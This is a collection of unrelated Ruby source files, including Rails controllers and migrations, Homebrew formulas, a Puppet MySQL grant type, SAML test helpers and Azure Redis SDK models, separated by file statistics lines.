missing_authn_context_saml_settings settings = saml_settings.dup settings.authn_context = nil settings end def saml_test_key @saml_test_key ||= File.read(Rails.root.join('keys', 'saml_test_sp.key')) end # generates a SAML response and returns a parsed Nokogiri XML document def generate_saml_response(user, settings = saml_settings, link: true) # user needs to be signed in in order to generate an assertion link_user_to_identity(user, link, settings) sign_in(user) saml_get_auth(settings) end def saml_get_auth(settings) # GET redirect binding Authn Request get :auth, params: { SAMLRequest: CGI.unescape(saml_request(settings)) } end def saml_post_auth(saml_request) # POST redirect binding Authn Request post :auth, params: { SAMLRequest: CGI.unescape(saml_request) } end private def link_user_to_identity(user, link, settings) return unless link IdentityLinker.new( user, settings.issuer, ).link_identity( ial: ial2_requested?(settings) ? 
true : nil, verified_attributes: ['email'], ) end def ial2_requested?(settings) settings.authn_context != Saml::Idp::Constants::IAL1_AUTHN_CONTEXT_CLASSREF end def saml_request(settings) authn_request(settings).split('SAMLRequest=').last end # generate a SAML Authn request def authn_request(settings = saml_settings, params = {}) OneLogin::RubySaml::Authrequest.new.create(settings, params) end # :reek:UncommunicativeMethodName, :reek:ControlParameter def visit_idp_from_sp_with_ial1(sp) if sp == :saml @saml_authn_request = auth_request.create(saml_settings) visit @saml_authn_request elsif sp == :oidc @state = SecureRandom.hex @client_id = 'urn:gov:gsa:openidconnect:sp:server' @nonce = SecureRandom.hex visit_idp_from_oidc_sp_with_ial1(state: @state, client_id: @client_id, nonce: @nonce) end end # :reek:UncommunicativeMethodName def visit_idp_from_oidc_sp_with_ial1(state: SecureRandom.hex, client_id:, nonce:) visit openid_connect_authorize_path( client_id: client_id, response_type: 'code', acr_values: Saml::Idp::Constants::IAL1_AUTHN_CONTEXT_CLASSREF, scope: 'openid email', redirect_uri: 'http://localhost:7654/auth/result', state: state, prompt: 'select_account', nonce: nonce, ) end def visit_idp_from_oidc_sp_with_loa1_prompt_login state = SecureRandom.hex client_id = 'urn:gov:gsa:openidconnect:sp:server' nonce = SecureRandom.hex visit openid_connect_authorize_path( client_id: client_id, response_type: 'code', acr_values: Saml::Idp::Constants::LOA1_AUTHN_CONTEXT_CLASSREF, scope: 'openid email', redirect_uri: 'http://localhost:7654/auth/result', state: state, prompt: 'login', nonce: nonce, ) end end
30.208178
105
0.733079
e21ee06188dd4c00a443ad6f7a4932daf49780fe
304
class Rpush260Updates < ActiveRecord::VERSION::MAJOR >= 5 ? ActiveRecord::Migration[5.0] : ActiveRecord::Migration
  def self.up
    add_column :rpush_notifications, :content_available, :boolean, default: false
  end

  def self.down
    remove_column :rpush_notifications, :content_available
  end
end
27.636364
114
0.763158
f83b4abd1e2f8753cd4ffd9ccb291505884ed6db
800
class Profiles::PreferencesController < Profiles::ApplicationController
  before_action :user

  def show
  end

  def update
    begin
      if @user.update_attributes(preferences_params)
        flash[:notice] = 'Preferences saved.'
      else
        flash[:alert] = 'Failed to save preferences.'
      end
    rescue ArgumentError => e
      # Raised when `dashboard` is given an invalid value.
      flash[:alert] = "Failed to save preferences (#{e.message})."
    end

    respond_to do |format|
      format.html { redirect_to profile_preferences_path }
      format.js
    end
  end

  private

  def user
    @user = current_user
  end

  def preferences_params
    params.require(:user).permit(
      :color_scheme_id,
      :dashboard,
      :project_view,
      :theme_id
    )
  end
end
20
71
0.65
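Profiles::PreferencesController above only flashes a notice or alert and redirects, so a spec for it stays small. A hedged controller-spec sketch, assuming Devise's sign_in helper, a :user factory, and Rails 5 spec syntax, might look like:

# Hypothetical spec for the controller above; sign_in, the :user factory and
# the profile_preferences_path route are assumed to exist in the surrounding app.
describe Profiles::PreferencesController, type: :controller do
  let(:user) { create(:user) }
  before { sign_in(user) }

  it 'saves preferences and redirects back to the preferences page' do
    put :update, params: { user: { theme_id: 1 } }
    expect(flash[:notice]).to eq('Preferences saved.')
    expect(response).to redirect_to(profile_preferences_path)
  end
end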
28d5a71bc2b37b62568e4b1a383446ef434f9994
2,827
require 'yaml' module Readspeed class Tracker attr_accessor :file_name def initialize(title, input: $stdin, output: $stdout) @input = input @output = output @pages = 0 @times = [] @title = title end def start output.puts "#{help_info}\n Starting recording. Press [ENTER] when you finish reading page." while true do start_time = Time.now case read_command when :quit write_summary_to_file break when :pause @paused = true when :resume @paused = false when :help print_help else record_next_page(start_time, Time.now) end end end private attr_reader :input, :output COMMANDS = { quit: %w(q quit), pause: %w(p pause), resume: %w(r resume), help: %w(h help) } def expanded_commands COMMANDS.reduce({}) do |sum, (command, inputs)| inputs.each { |i| sum[i] = command } sum end end def read_command status = @paused ? "(paused)" : "#{@pages}" output.print "#{status}> " user_input = input.gets.chomp if @paused && user_input == '' @paused = false selected_command = :resume else selected_command = expanded_commands[user_input] end selected_command end def record_next_page(start_time, end_time) @pages += 1 @times << end_time - start_time output.puts summary end def help_info <<~EOS Press [ENTER] without typing anything to start next page or one of the following commands: q, quit - quit the application, write summary to file p, pause - record current page, pause r, resume - resume from pause h, help - show help (this) EOS end def write_summary_to_file output.puts "Writing summary to #{file_name}" if File.exist?(file_name) reading_summary = YAML.load(File.read(file_name)) else reading_summary = { title: @title, started_at: Time.now, readings: [] } end reading = { session_finished_at: Time.now, pages: @pages, times: @times, summary: summary } reading_summary[:readings] << reading File.open(file_name, 'w') { |f| f.write(reading_summary.to_yaml) } end def summary "Finished page #{@pages}. Last: #{last} Average: #{average} Total: #{total}" end def last @times.last.round(1) end def average (total / @pages).round(1) end def total @times.reduce(&:+).round(1) end def file_name @file_name || @title.gsub(/( )/, '_').downcase + ".yaml" end end end
22.085938
98
0.558543
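Because Readspeed::Tracker takes its input and output streams as keyword arguments, it can be driven non-interactively. The sketch below feeds it two page turns and a quit command through StringIO; the book title and output file name are made up, and the quit command writes a small YAML summary to disk.

# Assumes the Readspeed::Tracker file above has already been required.
require 'stringio'

# Two blank lines record two pages, then "q" quits and writes the summary file.
input  = StringIO.new("\n\nq\n")
output = StringIO.new

tracker = Readspeed::Tracker.new('Some Book', input: input, output: output)
tracker.file_name = 'some_book_readspeed.yaml'   # hypothetical output file
tracker.start

puts output.string   # per-page summaries plus the final "Writing summary to ..." notice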
e9352d5f65e8f1784c9e90cd7147fdc3293228ce
1,823
class ConsulTemplate < Formula desc "Generic template rendering and notifications with Consul" homepage "https://github.com/hashicorp/consul-template" url "https://github.com/hashicorp/consul-template.git", :tag => "v0.19.5", :revision => "f8c8205caf458dfd0ecab69d029ab112803aa587" head "https://github.com/hashicorp/consul-template.git" bottle do cellar :any_skip_relocation sha256 "921d8401cb88f770060bbe6f59eb5a0499764b8539b42682cddaaf8db526ecc2" => :mojave sha256 "859b8ac6cb1aaff1d1b7be4b41d0eef356d86634eb76a2601d3cce1626d03bb4" => :high_sierra sha256 "4bc3abb371cf2a3f6243800d7b9325a0479639d488a20911eff3ff11a68f2a15" => :sierra sha256 "dec98da73d913cf2a2d4364826427eb42dab3638d09ac198e7f9e449082aa8ad" => :el_capitan sha256 "f7d014f2a2e93fd5faa29c0e165293b12e735fba7ddcd085d88269b7ca0a3be6" => :x86_64_linux end depends_on "go" => :build def install ENV["GOPATH"] = buildpath arch = MacOS.prefer_64_bit? ? "amd64" : "386" ENV["XC_OS"] = "darwin" ENV["XC_ARCH"] = arch dir = buildpath/"src/github.com/hashicorp/consul-template" dir.install buildpath.children - [buildpath/".brew_home"] cd dir do project = "github.com/hashicorp/consul-template" commit = Utils.popen_read("git rev-parse --short HEAD").chomp ldflags = ["-X #{project}/version.Name=consul-template", "-X #{project}/version.GitCommit=#{commit}"] system "go", "build", "-o", bin/"consul-template", "-ldflags", ldflags.join(" ") prefix.install_metafiles end end test do (testpath/"template").write <<~EOS {{"homebrew" | toTitle}} EOS system bin/"consul-template", "-once", "-template", "template:test-result" assert_equal "Homebrew", (testpath/"test-result").read.chomp end end
38.787234
94
0.706528
79f419f3897fca804bb77470177aa98e8042a9b9
984
# == Schema Information # # Table name: flow_inds # # id :integer not null, primary key # flow_id :integer not null # ind_id :integer not null # value(Numeric value) :float not null # # Indexes # # flow_inds_flow_id_idx (flow_id) # flow_inds_flow_id_ind_id_key (flow_id,ind_id) UNIQUE # flow_inds_ind_id_idx (ind_id) # # Foreign Keys # # fk_rails_... (flow_id => flows.id) ON DELETE => cascade ON UPDATE => cascade # fk_rails_... (ind_id => inds.id) ON DELETE => cascade ON UPDATE => cascade # module Api module V3 class FlowInd < BlueTable belongs_to :flow belongs_to :ind def self.import_key [ {name: :flow_id, sql_type: 'INT'}, {name: :ind_id, sql_type: 'INT'} ] end def self.blue_foreign_keys [ {name: :ind_id, table_class: Api::V3::Ind} ] end end end end
23.428571
80
0.555894
216ff9db04fc9b05940a966a02c27a0762d3aef2
1,815
class GraphqlController < ApplicationController skip_forgery_protection if: :skip_csrf_protection? def execute variables = ensure_hash(params[:variables]) query = params[:query] operation_name = params[:operationName] context = { pundit_user: pundit_user, current_school: current_school, current_user: current_user, current_school_admin: current_school_admin, session: session, notifications: [], token_auth: api_token.present? } result = PupilfirstSchema.execute(query, variables: variables, context: context, operation_name: operation_name) # Inject notifications into the GraphQL response, if any. These should be manually handled by the client. result[:notifications] = context[:notifications] if context[:notifications].any? render json: result rescue => e raise e unless Rails.env.development? handle_error_in_development e end private def introspection? Rails.env.development? && params[:introspection] == 'true' end def skip_csrf_protection? introspection? || (api_token.present? && current_user.present?) end # Handle form data, JSON body, or a blank value def ensure_hash(ambiguous_param) case ambiguous_param when String if ambiguous_param.present? ensure_hash(JSON.parse(ambiguous_param)) else {} end when Hash, ActionController::Parameters ambiguous_param when nil {} else raise ArgumentError, "Unexpected parameter: #{ambiguous_param}" end end def handle_error_in_development(error) logger.error error.message logger.error error.backtrace.join("\n") render json: { error: { message: error.message, backtrace: error.backtrace }, data: {} }, status: :internal_server_error end end
27.5
124
0.707989
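GraphqlController#execute above accepts variables as a JSON string, a hash, or nothing at all, thanks to ensure_hash. A hedged request-spec sketch follows; the /graphql route and whatever authentication the surrounding app enforces are assumptions.

# Hypothetical request spec; assumes the app routes POST /graphql to
# GraphqlController#execute and that this introspection-style query
# needs no extra authentication.
it 'executes a query and returns a JSON body with a data key' do
  post '/graphql', params: {
    query: '{ __typename }',
    variables: { unused: 'value' }.to_json   # ensure_hash parses JSON strings like this
  }
  expect(JSON.parse(response.body)).to have_key('data')
end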
abaa33208a95458778805fc6bc8357115b4bfc73
5,281
# frozen_string_literal: true Puppet::Type.newtype(:mysql_grant) do @doc = <<-PUPPET @summary Manage a MySQL user's rights. PUPPET ensurable autorequire(:file) { '/root/.my.cnf' } autorequire(:mysql_user) { self[:user] } def initialize(*args) super # Forcibly munge any privilege with 'ALL' in the array to exist of just # 'ALL'. This can't be done in the munge in the property as that iterates # over the array and there's no way to replace the entire array before it's # returned to the provider. if self[:ensure] == :present && Array(self[:privileges]).size > 1 && self[:privileges].to_s.include?('ALL') self[:privileges] = 'ALL' end # Sort the privileges array in order to ensure the comparision in the provider # self.instances method match. Otherwise this causes it to keep resetting the # privileges. # rubocop:disable Style/MultilineBlockChain self[:privileges] = Array(self[:privileges]).map { |priv| # split and sort the column_privileges in the parentheses and rejoin if priv.include?('(') type, col = priv.strip.split(%r{\s+|\b}, 2) type.upcase + ' (' + col.slice(1...-1).strip.split(%r{\s*,\s*}).sort.join(', ') + ')' else priv.strip.upcase end }.uniq.reject { |k| ['GRANT', 'GRANT OPTION'].include?(k) }.sort! end # rubocop:enable Style/MultilineBlockChain validate do raise(_('mysql_grant: `privileges` `parameter` is required.')) if self[:ensure] == :present && self[:privileges].nil? raise(_('mysql_grant: `privileges` `parameter`: PROXY can only be specified by itself.')) if Array(self[:privileges]).size > 1 && Array(self[:privileges]).include?('PROXY') raise(_('mysql_grant: `table` `parameter` is required.')) if self[:ensure] == :present && self[:table].nil? raise(_('mysql_grant: `user` `parameter` is required.')) if self[:ensure] == :present && self[:user].nil? if self[:user] && self[:table] raise(_('mysql_grant: `name` `parameter` must match user@host/table format.')) if self[:name] != "#{self[:user]}/#{self[:table]}" end end newparam(:name, namevar: true) do desc 'Name to describe the grant.' munge do |value| value.delete("'") end end newproperty(:privileges, array_matching: :all) do desc 'Privileges for user' validate do |value| mysql_version = Facter.value(:mysql_version) if value =~ %r{proxy}i && Puppet::Util::Package.versioncmp(mysql_version, '5.5.0') < 0 raise(ArgumentError, _('mysql_grant: PROXY user not supported on mysql versions < 5.5.0. Current version %{version}.') % { version: mysql_version }) end end end newproperty(:table) do desc 'Table to apply privileges to.' validate do |value| if Array(@resource[:privileges]).include?('PROXY') && !%r{^[0-9a-zA-Z$_]*@[\w%\.:\-\/]*$}.match(value) raise(ArgumentError, _('mysql_grant: `table` `property` for PROXY should be specified as proxy_user@proxy_host.')) end end munge do |value| value.delete('`') end newvalues(%r{.*\..*}, %r{^[0-9a-zA-Z$_]*@[\w%\.:\-/]*$}) end newproperty(:user) do desc 'User to operate on.' 
validate do |value| # http://dev.mysql.com/doc/refman/5.5/en/identifiers.html # If at least one special char is used, string must be quoted # http://stackoverflow.com/questions/8055727/negating-a-backreference-in-regular-expressions/8057827#8057827 # rubocop:disable Lint/AssignmentInCondition # rubocop:disable Lint/UselessAssignment if matches = %r{^(['`"])((?!\1).)*\1@([\w%\.:\-/]+)$}.match(value) user_part = matches[2] host_part = matches[3] elsif matches = %r{^([0-9a-zA-Z$_]*)@([\w%\.:\-/]+)$}.match(value) user_part = matches[1] host_part = matches[2] elsif matches = %r{^((?!['`"]).*[^0-9a-zA-Z$_].*)@(.+)$}.match(value) user_part = matches[1] host_part = matches[2] else raise(ArgumentError, _('mysql_grant: Invalid database user %{user}.') % { user: value }) end # rubocop:enable Lint/AssignmentInCondition # rubocop:enable Lint/UselessAssignment mysql_version = Facter.value(:mysql_version) unless mysql_version.nil? raise(ArgumentError, _('mysql_grant: MySQL usernames are limited to a maximum of 16 characters.')) if Puppet::Util::Package.versioncmp(mysql_version, '5.7.8') < 0 && user_part.size > 16 raise(ArgumentError, _('mysql_grant: MySQL usernames are limited to a maximum of 32 characters.')) if Puppet::Util::Package.versioncmp(mysql_version, '10.0.0') < 0 && user_part.size > 32 raise(ArgumentError, _('mysql_grant: MySQL usernames are limited to a maximum of 80 characters.')) if Puppet::Util::Package.versioncmp(mysql_version, '10.0.0') > 0 && user_part.size > 80 end end munge do |value| matches = %r{^((['`"]?).*\2)@(.+)$}.match(value) "#{matches[1]}@#{matches[3].downcase}" end end newproperty(:options, array_matching: :all) do desc 'Options to grant.' end end
43.286885
194
0.616171
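The mysql_grant type above does most of its work in validation and munging: the name must equal user/table, PROXY must stand alone, and any privilege list containing ALL collapses to just ALL. A minimal sketch of exercising that from Ruby, in the style of a Puppet type spec, might look like this (the user, host, and database names are made up, and Puppet plus the module's lib path are assumed to be loaded):

# Hypothetical instantiation of the type above, as a Puppet type spec would do it.
grant = Puppet::Type.type(:mysql_grant).new(
  name:       'alice@localhost/mydb.*',   # must match "#{user}/#{table}"
  ensure:     :present,
  user:       'alice@localhost',
  table:      'mydb.*',
  privileges: ['SELECT', 'ALL'],          # initialize munges this down to just ALL
)

grant[:privileges]   # => ["ALL"]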
3841811cd35a43b08a2ccc7f4be7d19fcf63aad8
551
Rails.application.configure do config.cache_classes = true config.eager_load = true config.consider_all_requests_local = false config.action_controller.perform_caching = true config.serve_static_assets = false config.assets.js_compressor = :uglifier config.assets.compile = false config.assets.digest = true config.log_level = :debug config.i18n.fallbacks = true config.active_support.deprecation = :notify config.log_formatter = ::Logger::Formatter.new config.active_record.dump_schema_after_migration = false end
30.611111
58
0.780399
03357d0732d07b283c318b74784e9e4302bd8b6b
1,591
# encoding: utf-8 require File.expand_path('../spec_helper.rb', __FILE__) describe 'Backup::Configuration' do after do Backup::Configuration.send(:remove_const, 'Foo') end it 'should create modules for missing constants' do Backup::Configuration::Foo.class.should == Module end describe 'a generated module' do before do module Backup class Foo; end end end after do Backup.send(:remove_const, 'Foo') end it 'should create modules for missing constants' do Backup::Configuration::Foo::A::B.class.should == Module end it 'should pass calls to .defaults to the proper class' do Backup::Logger.expects(:warn) Backup::Foo.expects(:defaults) Backup::Configuration::Foo.defaults end it 'should pass a given block to .defaults to the proper class' do Backup::Logger.expects(:warn) configuration = mock Backup::Foo.expects(:defaults).yields(configuration) configuration.expects(:foo=).with('bar') Backup::Configuration::Foo.defaults do |config| config.foo = 'bar' end end it 'should log a deprecation warning' do Backup::Foo.stubs(:defaults) Backup::Logger.expects(:warn).with do |err| err.message.should == "ConfigurationError: [DEPRECATION WARNING]\n" + " Backup::Configuration::Foo.defaults is being deprecated.\n" + " To set pre-configured defaults for Backup::Foo, use:\n" + " Backup::Foo.defaults" end Backup::Configuration::Foo.defaults end end end
25.253968
72
0.649277
f80bd240b65fa842733a13370e5bd9564c5df5ea
358
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Cosmosdb::Mgmt::V2015_04_08 module Models # # Defines values for IndexKind # module IndexKind Hash = "Hash" Range = "Range" Spatial = "Spatial" end end end
21.058824
70
0.670391
1a257aa18f87a2ab62d1eb6a4dadc5c79853a714
3,326
class Fbthrift < Formula desc "Facebook's branch of Apache Thrift, including a new C++ server" homepage "https://github.com/facebook/fbthrift" url "https://github.com/facebook/fbthrift/archive/v2022.05.16.00.tar.gz" sha256 "dfc15d27f25d33e25f23b42a391d45f1c890727a271a4d078e035e374d3c5666" license "Apache-2.0" head "https://github.com/facebook/fbthrift.git", branch: "main" bottle do sha256 cellar: :any, arm64_monterey: "9d43b1a9a9bc2403a054cccf9b2ac150bb9481607beeaee285dab5e4feadfabf" sha256 cellar: :any, arm64_big_sur: "0f165329de0341c6bac949a0c2b660a1c65068ff003f0dfe83335a3b1fe72f08" sha256 cellar: :any, monterey: "970459281f31fad7c9295d5f7d828628ca8248673afc3ee9579f0b36a4867e87" sha256 cellar: :any, big_sur: "09635f364183f07489413e9189fb29998e993556456e819beeea7093fc96b032" sha256 cellar: :any, catalina: "560d580a54a274be4f583d1bbb620b435d51761392e4218e4b2ba250a93c8bd0" sha256 cellar: :any_skip_relocation, x86_64_linux: "9d57278ac7db7f5c22d21d178560ac9e9764fb5d5b92a8a6ed21468b88314ee3" end depends_on "bison" => :build # Needs Bison 3.1+ depends_on "cmake" => :build depends_on "boost" depends_on "fizz" depends_on "fmt" depends_on "folly" depends_on "gflags" depends_on "glog" depends_on "[email protected]" depends_on "wangle" depends_on "zstd" uses_from_macos "flex" => :build uses_from_macos "zlib" on_macos do depends_on "llvm" if DevelopmentTools.clang_build_version <= 1100 end on_linux do depends_on "gcc@10" end fails_with :clang do build 1100 cause <<~EOS error: 'asm goto' constructs are not supported yet EOS end fails_with gcc: "5" # C++ 17 fails_with gcc: "11" # https://github.com/facebook/folly#ubuntu-lts-centos-stream-fedora # Fix build failure on Catalina. # https://github.com/facebook/fbthrift/pull/500 patch do url "https://github.com/facebook/fbthrift/commit/eb566ef3fd748c04ecd6058351644edee0d02dbf.patch?full_index=1" sha256 "12286a10e3802e15ea03ea4853edd8640f9e5aedcac662b324a708625348a809" end def install ENV.llvm_clang if OS.mac? && (DevelopmentTools.clang_build_version <= 1100) # The static libraries are a bit annoying to build. If modifying this formula # to include them, make sure `bin/thrift1` links with the dynamic libraries # instead of the static ones (e.g. `libcompiler_base`, `libcompiler_lib`, etc.) shared_args = ["-DBUILD_SHARED_LIBS=ON", "-DCMAKE_INSTALL_RPATH=#{rpath}"] shared_args << "-DCMAKE_SHARED_LINKER_FLAGS=-Wl,-undefined,dynamic_lookup" if OS.mac? system "cmake", "-S", ".", "-B", "build/shared", *std_cmake_args, *shared_args system "cmake", "--build", "build/shared" system "cmake", "--install", "build/shared" elisp.install "thrift/contrib/thrift.el" (share/"vim/vimfiles/syntax").install "thrift/contrib/thrift.vim" end test do (testpath/"example.thrift").write <<~EOS namespace cpp tamvm service ExampleService { i32 get_number(1:i32 number); } EOS system bin/"thrift1", "--gen", "mstch_cpp2", "example.thrift" assert_predicate testpath/"gen-cpp2", :exist? assert_predicate testpath/"gen-cpp2", :directory? end end
37.370787
123
0.715574
5d01823afd380711336fd58fc9b252a8409abcb8
1,106
class Libgeotiff < Formula desc "Library and tools for dealing with GeoTIFF" homepage "http://geotiff.osgeo.org/" url "http://download.osgeo.org/geotiff/libgeotiff/libgeotiff-1.4.1.tar.gz" sha256 "acfc76ee19b3d41bb9c7e8b780ca55d413893a96c09f3b27bdb9b2573b41fd23" revision 1 bottle do sha256 "2d90f23486794745cbf3880b8327f6c9b8d1ee5b3952b599d372e139e3fa386a" => :el_capitan sha256 "cc50df08d046654c4dcdb71dca892522ddbe7f4d08bf76db875843b5278f8c72" => :yosemite sha256 "a06efe08c1bd6a4c8c2e17d8081bafb2c6fd7e6a46083d7ff3228f98d3dca7e3" => :mavericks sha256 "07efe6adec3e35b7e3d05af18e62a407041d84a96fa91a64757aa1e0b4696fd6" => :mountain_lion end depends_on "libtiff" depends_on "lzlib" depends_on "jpeg" depends_on "proj" def install args = ["--disable-dependency-tracking", "--prefix=#{prefix}", "--with-libtiff=#{HOMEBREW_PREFIX}", "--with-zlib=#{HOMEBREW_PREFIX}", "--with-jpeg=#{HOMEBREW_PREFIX}"] system "./configure", *args system "make" # Separate steps or install fails system "make", "install" end end
36.866667
95
0.740506
38fec077b826194731549421a0cd4bc6413372e4
9,430
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Redis::Mgmt::V2017_02_01 module Models # # A single Redis item in List or Get Operation. # class RedisResource < TrackedResource include MsRestAzure # @return [Hash{String => String}] All Redis Settings. Few possible keys: # rdb-backup-enabled,rdb-storage-connection-string,rdb-backup-frequency,maxmemory-delta,maxmemory-policy,notify-keyspace-events,maxmemory-samples,slowlog-log-slower-than,slowlog-max-len,list-max-ziplist-entries,list-max-ziplist-value,hash-max-ziplist-entries,hash-max-ziplist-value,set-max-intset-entries,zset-max-ziplist-entries,zset-max-ziplist-value # etc. attr_accessor :redis_configuration # @return [Boolean] Specifies whether the non-ssl Redis server port # (6379) is enabled. attr_accessor :enable_non_ssl_port # @return [Hash{String => String}] tenantSettings attr_accessor :tenant_settings # @return [Integer] The number of shards to be created on a Premium # Cluster Cache. attr_accessor :shard_count # @return [String] The full resource ID of a subnet in a virtual network # to deploy the Redis cache in. Example format: # /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/Microsoft.{Network|ClassicNetwork}/VirtualNetworks/vnet1/subnets/subnet1 attr_accessor :subnet_id # @return [String] Static IP address. Required when deploying a Redis # cache inside an existing Azure Virtual Network. attr_accessor :static_ip # @return [Sku] The SKU of the Redis cache to deploy. attr_accessor :sku # @return [String] Redis version. attr_accessor :redis_version # @return [String] Redis instance provisioning status. attr_accessor :provisioning_state # @return [String] Redis host name. attr_accessor :host_name # @return [Integer] Redis non-SSL port. attr_accessor :port # @return [Integer] Redis SSL port. attr_accessor :ssl_port # @return [RedisAccessKeys] The keys of the Redis cache - not set if this # object is not the response to Create or Update redis cache attr_accessor :access_keys # @return [RedisLinkedServerList] List of the linked servers associated # with the cache attr_accessor :linked_servers # # Mapper for RedisResource class as Ruby Hash. # This will be used for serialization/deserialization. 
# def self.mapper() { client_side_validation: true, required: false, serialized_name: 'RedisResource', type: { name: 'Composite', class_name: 'RedisResource', model_properties: { id: { client_side_validation: true, required: false, read_only: true, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, location: { client_side_validation: true, required: true, serialized_name: 'location', type: { name: 'String' } }, redis_configuration: { client_side_validation: true, required: false, serialized_name: 'properties.redisConfiguration', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, enable_non_ssl_port: { client_side_validation: true, required: false, serialized_name: 'properties.enableNonSslPort', type: { name: 'Boolean' } }, tenant_settings: { client_side_validation: true, required: false, serialized_name: 'properties.tenantSettings', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, shard_count: { client_side_validation: true, required: false, serialized_name: 'properties.shardCount', type: { name: 'Number' } }, subnet_id: { client_side_validation: true, required: false, serialized_name: 'properties.subnetId', constraints: { Pattern: '^/subscriptions/[^/]*/resourceGroups/[^/]*/providers/Microsoft.(ClassicNetwork|Network)/virtualNetworks/[^/]*/subnets/[^/]*$' }, type: { name: 'String' } }, static_ip: { client_side_validation: true, required: false, serialized_name: 'properties.staticIP', constraints: { Pattern: '^\d+\.\d+\.\d+\.\d+$' }, type: { name: 'String' } }, sku: { client_side_validation: true, required: false, serialized_name: 'properties.sku', type: { name: 'Composite', class_name: 'Sku' } }, redis_version: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.redisVersion', type: { name: 'String' } }, provisioning_state: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.provisioningState', type: { name: 'String' } }, host_name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.hostName', type: { name: 'String' } }, port: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.port', type: { name: 'Number' } }, ssl_port: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.sslPort', type: { name: 'Number' } }, access_keys: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.accessKeys', type: { name: 'Composite', class_name: 'RedisAccessKeys' } }, linked_servers: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.linkedServers', type: { name: 'Composite', class_name: 'RedisLinkedServerList' } } } } } end end end end
33.439716
358
0.468187
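RedisResource above is a plain generated model: an attr_accessor per property plus a mapper hash that drives MsRest serialization. A small sketch of building one follows; the attribute values are illustrative, and location comes from the TrackedResource parent rather than this file.

# Illustrative only; assumes the azure_mgmt_redis models are loaded and that
# real values would come from the Azure Redis management API.
models = Azure::Redis::Mgmt::V2017_02_01::Models

resource = models::RedisResource.new
resource.location            = 'westus'                 # inherited from TrackedResource
resource.enable_non_ssl_port = false
resource.redis_configuration = { 'maxmemory-policy' => 'allkeys-lru' }
resource.sku                 = models::Sku.new

mapper = models::RedisResource.mapper   # hash consumed by the MsRest (de)serializer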